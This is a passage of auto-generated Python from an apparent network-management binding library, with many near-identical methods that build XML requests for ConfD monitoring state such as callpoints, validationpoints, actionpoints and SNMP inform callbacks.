range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
        # the 'id' kwarg was already popped for the callpoint key above;
        # a second pop would raise KeyError, so reuse the same value
        id.text = id_key.text
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(callpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id = ET.SubElement(validationpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
        # the 'id' kwarg was already popped for the validationpoint key above;
        # a second pop would raise KeyError, so reuse the same value
        id.text = id_key.text
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
        # the 'id' kwarg was already popped for the validationpoint key above;
        # a second pop would raise KeyError, so reuse the same value
        id.text = id_key.text
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(validationpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id = ET.SubElement(actionpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = id_key.text  # reuse the value popped above; a second kwargs.pop('id') would raise KeyError
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = id_key.text  # reuse the value popped above; a second kwargs.pop('id') would raise KeyError
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(actionpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_actionpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
actionpoint = ET.SubElement(callpoints, "actionpoint")
id_key = ET.SubElement(actionpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(actionpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id = ET.SubElement(snmp_inform_callback, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = id_key.text  # reuse the value popped above; a second kwargs.pop('id') would raise KeyError
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = id_key.text  # reuse the value popped above; a second kwargs.pop('id') would raise KeyError
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
